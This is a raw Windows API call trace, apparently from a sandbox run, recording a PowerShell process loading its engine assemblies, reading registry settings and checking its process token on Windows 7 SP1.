	[0552.160] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x2c417d4, puLen=0x16d9b0) returned 1
	[0552.160] lstrlenW (lpString="System.Management.Automation") returned 28
	[0552.160] CoTaskMemAlloc (cb=0x3c) returned 0x2513b0
	[0552.160] lstrcpyW (in: lpString1=0x2513b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0552.160] CoTaskMemFree (pv=0x2513b0) 
	[0552.160] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x2c41830, puLen=0x16d9b0) returned 1
	[0552.160] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0552.160] CoTaskMemAlloc (cb=0x20) returned 0x24c2a0
	[0552.160] lstrcpyW (in: lpString1=0x24c2a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0552.160] CoTaskMemFree (pv=0x24c2a0) 
	[0552.161] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x2c41870, puLen=0x16d9b0) returned 1
	[0552.161] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0552.161] CoTaskMemAlloc (cb=0x44) returned 0x2513b0
	[0552.161] lstrcpyW (in: lpString1=0x2513b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0552.161] CoTaskMemFree (pv=0x2513b0) 
	[0552.161] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x2c418d8, puLen=0x16d9b0) returned 1
	[0552.161] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0552.161] CoTaskMemAlloc (cb=0x76) returned 0x1ef380
	[0552.161] lstrcpyW (in: lpString1=0x1ef380, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0552.161] CoTaskMemFree (pv=0x1ef380) 
	[0552.161] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x2c41974, puLen=0x16d9b0) returned 1
	[0552.161] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0552.161] CoTaskMemAlloc (cb=0x44) returned 0x2513b0
	[0552.161] lstrcpyW (in: lpString1=0x2513b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0552.161] CoTaskMemFree (pv=0x2513b0) 
	[0552.161] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x2c419d8, puLen=0x16d9b0) returned 1
	[0552.161] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0552.161] CoTaskMemAlloc (cb=0x58) returned 0x1d7460
	[0552.161] lstrcpyW (in: lpString1=0x1d7460, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0552.161] CoTaskMemFree (pv=0x1d7460) 
	[0552.161] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x2c41a54, puLen=0x16d9b0) returned 1
	[0552.161] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0552.161] CoTaskMemAlloc (cb=0x20) returned 0x24c2a0
	[0552.161] lstrcpyW (in: lpString1=0x24c2a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0552.161] CoTaskMemFree (pv=0x24c2a0) 
	[0552.161] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x2c416fc, puLen=0x16d9b0) returned 1
	[0552.161] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0552.161] CoTaskMemAlloc (cb=0x66) returned 0x2411c0
	[0552.161] lstrcpyW (in: lpString1=0x2411c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0552.161] CoTaskMemFree (pv=0x2411c0) 
	[0552.162] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x0, puLen=0x16d9b0) returned 0
	[0552.162] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x0, puLen=0x16d9b0) returned 0
	[0552.162] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16d9b8, puLen=0x16d9b0 | out: lplpBuffer=0x16d9b8*=0x0, puLen=0x16d9b0) returned 0
	[0552.162] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16d988, puLen=0x16d980 | out: lplpBuffer=0x16d988*=0x2c416a4, puLen=0x16d980) returned 1
	[0552.162] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0552.162] VerLanguageNameW (in: wLang=0x0, szLang=0x1f1ef0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0552.162] CoTaskMemFree (pv=0x1f1ef0) 
	[0552.162] VerQueryValueW (in: pBlock=0x2c41608, lpSubBlock="\\", lplpBuffer=0x16d9d8, puLen=0x16d9d0 | out: lplpBuffer=0x16d9d8*=0x2c41630, puLen=0x16d9d0) returned 1
	[0552.177] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0552.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.177] CoTaskMemFree (pv=0x1a9d20) 
	[0552.182] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0552.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.182] CoTaskMemFree (pv=0x1a9d20) 
	[0552.187] lstrlenW (lpString="䅁") returned 1
	[0553.882] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d8a8 | out: phkResult=0x16d8a8*=0x2f4) returned 0x0
	[0553.884] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d898 | out: phkResult=0x16d898*=0x2f8) returned 0x0
	[0553.884] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d928 | out: phkResult=0x16d928*=0x2fc) returned 0x0
	[0553.888] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d86c, lpData=0x0, lpcbData=0x16d868*=0x0 | out: lpType=0x16d86c*=0x1, lpData=0x0, lpcbData=0x16d868*=0x56) returned 0x0
	[0553.889] CoTaskMemAlloc (cb=0x5a) returned 0x241150
	[0553.889] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d83c, lpData=0x241150, lpcbData=0x16d838*=0x56 | out: lpType=0x16d83c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d838*=0x56) returned 0x0
	[0553.889] CoTaskMemFree (pv=0x241150) 
	[0553.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0553.922] CoTaskMemAlloc (cb=0x104) returned 0x1a9d20
	[0553.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0553.922] CoTaskMemFree (pv=0x1a9d20) 
	[0563.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0563.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0566.078] CoTaskMemAlloc (cb=0x104) returned 0x1a9e30
	[0566.078] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.079] CoTaskMemFree (pv=0x1a9e30) 
	[0566.080] CoTaskMemAlloc (cb=0x104) returned 0x1a9e30
	[0566.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.080] CoTaskMemFree (pv=0x1a9e30) 
	[0567.383] CoTaskMemAlloc (cb=0x104) returned 0x1a9e30
	[0567.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.383] CoTaskMemFree (pv=0x1a9e30) 
	[0567.385] CoTaskMemAlloc (cb=0x104) returned 0x1a9e30
	[0567.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.385] CoTaskMemFree (pv=0x1a9e30) 
	[0567.385] CoTaskMemAlloc (cb=0x104) returned 0x1a9e30
	[0567.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.385] CoTaskMemFree (pv=0x1a9e30) 
	[0570.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0570.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0571.986] CoTaskMemAlloc (cb=0x104) returned 0x1a9e30
	[0571.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0571.987] CoTaskMemFree (pv=0x1a9e30) 
	[0572.017] CoTaskMemAlloc (cb=0x104) returned 0x1a9e30
	[0572.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1a9e30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.017] CoTaskMemFree (pv=0x1a9e30) 
	[0575.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0575.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0586.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0586.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0590.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0590.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0592.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0592.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0598.249] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0598.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0598.249] CoTaskMemFree (pv=0x1aa050) 
	[0598.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0598.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0598.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0599.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0599.424] SetErrorMode (uMode=0x1) returned 0x1
	[0599.424] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16d800 | out: lpFileInformation=0x16d800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0599.424] SetErrorMode (uMode=0x1) returned 0x1
	[0607.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0607.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0607.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0607.024] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0607.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.024] CoTaskMemFree (pv=0x1aa050) 
	[0607.028] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0607.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.028] CoTaskMemFree (pv=0x1aa050) 
	[0607.028] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0607.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.028] CoTaskMemFree (pv=0x1aa050) 
	[0607.031] CoCreateGuid (in: pguid=0x16dbc8 | out: pguid=0x16dbc8*(Data1=0x16586cd4, Data2=0x41ab, Data3=0x46a9, Data4=([0]=0x9b, [1]=0xd2, [2]=0xbc, [3]=0x55, [4]=0x9b, [5]=0xaf, [6]=0x7e, [7]=0x41))) returned 0x0
	[0607.035] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0607.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.035] CoTaskMemFree (pv=0x1aa050) 
	[0607.038] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0607.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.038] CoTaskMemFree (pv=0x1aa050) 
	[0607.041] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0607.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.041] CoTaskMemFree (pv=0x1aa050) 
	[0607.049] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0608.013] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16d870 | out: lpConsoleScreenBufferInfo=0x16d870) returned 1
	[0608.020] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0608.021] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16d870 | out: lpConsoleScreenBufferInfo=0x16d870) returned 1
	[0608.022] GetVersionExW (in: lpVersionInformation=0x16d800*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16d800*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0608.025] GetCurrentProcess () returned 0xffffffffffffffff
	[0608.025] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16d898 | out: TokenHandle=0x16d898*=0x314) returned 1
	[0608.030] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16d7b8 | out: TokenInformation=0x0, ReturnLength=0x16d7b8) returned 0
	[0608.031] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1b72e0
	[0608.031] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x1b72e0, TokenInformationLength=0x4, ReturnLength=0x16d7b8 | out: TokenInformation=0x1b72e0, ReturnLength=0x16d7b8) returned 1
	[0608.032] DuplicateTokenEx (in: hExistingToken=0x314, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16d918 | out: phNewToken=0x16d918*=0x2d8) returned 1
	[0608.032] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16d7b8 | out: TokenInformation=0x0, ReturnLength=0x16d7b8) returned 0
	[0608.032] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1b7290
	[0608.033] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x1b7290, TokenInformationLength=0x4, ReturnLength=0x16d7b8 | out: TokenInformation=0x1b7290, ReturnLength=0x16d7b8) returned 1
	[0608.033] CheckTokenMembership (in: TokenHandle=0x2d8, SidToCheck=0x2d1c3b0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16d928 | out: IsMember=0x16d928) returned 1
	[0608.034] CloseHandle (hObject=0x2d8) returned 1
	[0608.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0608.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
